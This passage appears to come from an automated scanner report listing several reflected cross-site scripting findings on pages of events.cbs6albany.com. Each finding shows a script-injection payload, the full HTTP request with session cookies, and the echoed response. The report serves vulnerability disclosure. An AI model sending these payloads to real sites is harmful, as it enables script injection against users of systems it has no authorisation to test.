<meta property="og:url" content="http://www.zvents.com/albany-ny/venues?901f7"><script>alert(1)</script>71466104ed=1" />
...[SNIP]...

4.422. http://events.cbs6albany.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /glens-falls-ny/venues/show/185044-glens-falls-civic-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c2f3"><script>alert(1)</script>52e176f2774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /glens-falls-ny/venues/show/185044-glens-falls-civic-center?5c2f3"><script>alert(1)</script>52e176f2774=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:03:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 94
ETag: "b2a71df20cca9ad3b45b4fd377f6f80d"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:03:18 GMT; HttpOnly
Content-Length: 60333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center?5c2f3"><script>alert(1)</script>52e176f2774=1" />
...[SNIP]...

4.423. http://events.cbs6albany.com/movies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c294"><script>alert(1)</script>4c316537d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies?1c294"><script>alert(1)</script>4c316537d45=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:54:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 33
ETag: "a9a477101eb3fc0dfca5a926a9e99ad2"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:54:51 GMT; HttpOnly
Content-Length: 32580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?1c294"><script>alert(1)</script>4c316537d45=1" />
...[SNIP]...

4.424. http://events.cbs6albany.com/movies/show/261885-127-hours [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/261885-127-hours

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8199d"><script>alert(1)</script>27e8499e0f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/261885-127-hours?8199d"><script>alert(1)</script>27e8499e0f3=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:56:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "f65a2dc5b39034e66f70cc4269aa0aec"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:56:17 GMT; HttpOnly
Content-Length: 41411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/261885-127-hours?8199d"><script>alert(1)</script>27e8499e0f3=1" />
...[SNIP]...

4.425. http://events.cbs6albany.com/movies/show/272945-black-swan [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/272945-black-swan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d205"><script>alert(1)</script>ffdf17a191f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/272945-black-swan?7d205"><script>alert(1)</script>ffdf17a191f=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:03:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 84
ETag: "d1cce8e56de3c285c862bc9353acffdd"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:03:33 GMT; HttpOnly
Content-Length: 41624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/272945-black-swan?7d205"><script>alert(1)</script>ffdf17a191f=1" />
...[SNIP]...

4.426. http://events.cbs6albany.com/movies/show/299065-the-kings-speech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/299065-the-kings-speech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76ea0"><script>alert(1)</script>a87ae6cc1e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/299065-the-kings-speech?76ea0"><script>alert(1)</script>a87ae6cc1e7=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:07:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 57
ETag: "75880169a64f5f1314a276556b25cc01"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:07:37 GMT; HttpOnly
Content-Length: 37962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/299065-the-kings-speech?76ea0"><script>alert(1)</script>a87ae6cc1e7=1" />
...[SNIP]...

4.427. http://events.cbs6albany.com/movies/show/324545-true-grit [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/324545-true-grit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bb0d"><script>alert(1)</script>1a0648de9b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/324545-true-grit?1bb0d"><script>alert(1)</script>1a0648de9b6=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:59:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 460
ETag: "b3cd811ea4feb204d44d5aecc5aa9d94"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:59:48 GMT; HttpOnly
Content-Length: 42792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/324545-true-grit?1bb0d"><script>alert(1)</script>1a0648de9b6=1" />
...[SNIP]...

4.428. http://events.cbs6albany.com/movies/show/344645-no-strings-attached [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/344645-no-strings-attached

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59d9f"><script>alert(1)</script>8f21b9a1a18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/344645-no-strings-attached?59d9f"><script>alert(1)</script>8f21b9a1a18=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:55:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 75
ETag: "33aa3028c23b18b3ba7675801d88d7ef"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:55:07 GMT; HttpOnly
Content-Length: 43020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/344645-no-strings-attached?59d9f"><script>alert(1)</script>8f21b9a1a18=1" />
...[SNIP]...

4.429. http://events.cbs6albany.com/movies/show/346845-sanctum-3d [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/346845-sanctum-3d

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4654f"><script>alert(1)</script>bbe709d4b33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/346845-sanctum-3d?4654f"><script>alert(1)</script>bbe709d4b33=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
